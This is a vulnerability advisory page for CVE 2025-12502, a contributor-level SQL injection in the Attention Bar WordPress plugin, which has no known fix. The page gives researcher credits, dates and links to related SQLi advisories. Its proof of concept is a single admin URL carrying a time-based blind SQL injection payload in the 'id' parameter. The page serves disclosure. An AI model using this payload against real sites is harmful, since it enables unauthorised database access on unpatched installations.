Attention Bar <= 0.7.2.1 – Contributor+ SQLi | CVE 2025-12502 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing high privilege users such as contributor and above to perform SQL injection attacks

Proof of Concept

As a contributor, open https://example.comn/wp-admin/admin.php?page=pd_nb_entries&delete&id=14+OR+%28SELECT+42+FROM+%28SELECT%28SLEEP%285%29%29%29b%29 and note the 5s delay in the response

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Yousof Nahya & Hamza Nour

Submitter

Yousof Nahya & Hamza Nour

Submitter website

https://linkedin.com/in/yousof-nahya/ https://linkedin.com/in/1hamza-nour/

Verified

Yes

WPVDB ID

75e63134-4c8a-45fd-b7fc-db40644ddb8c

Timeline

Publicly Published

2025-10-30 (about 2 months ago)

Added

2025-10-30 (about 2 months ago)

Last Updated

2025-11-03 (about 1 month ago)

Other

Published

Title

Published

2020-05-19

Title

Paid Memberships Pro < 2.3.3 - Authenticated SQL Injection

Published

2025-01-31

Title

Contest Gallery < 25.1.2 - Authenticated (Author+) SQL Injection

Published

2024-01-16

Title

Delhivery Logistics Courier <= 1.0.107 - Authenticated (Subscriber+) SQL Injection

Published

2025-11-14

Title

WP Project Manager < 2.6.27 - Authenticated (Subscriber+) SQL Injection via 'completed_at_operator'

Published

2019-11-13

Title

Email Subscribers & Newsletters < 4.3.1 - Unauthenticated Blind SQL Injection